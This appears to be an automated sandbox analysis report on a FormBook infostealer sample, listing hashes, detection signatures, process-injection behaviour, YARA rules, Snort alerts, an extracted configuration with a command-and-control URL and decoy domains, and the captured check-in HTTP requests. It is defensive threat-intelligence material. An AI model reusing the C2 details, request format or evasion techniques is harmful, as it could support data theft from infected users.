Loading ...

Play interactive tourEdit tour

Analysis Report 2435.bat

Overview

General Information

Sample Name:2435.bat (renamed file extension from bat to exe)
Analysis ID:433173
MD5:862b4c2abad2c07ac13d5e051c18ab86
SHA1:c78f0a59312c7902e445c5a31d4896907e96475c
SHA256:c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2435.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
    • 2435.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 3584 cmdline: /c del 'C:\Users\user\Desktop\2435.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.2435.exe.24d0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.2435.exe.24d0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.2435.exe.24d0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.2435.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.2435.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 2435.exeReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 2435.exeJoe Sandbox ML: detected
          Source: 1.1.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.2435.exe.24d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.control.exe.4d7f834.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.control.exe.43b090.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2435.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
          Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.knighttechinca.com/dxe/
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.northsytyle.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmpString found in binary or memory: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D5A NtCreateFile,1_2_00419D5A
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E0A NtReadFile,1_2_00419E0A
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,1_2_00419F3A
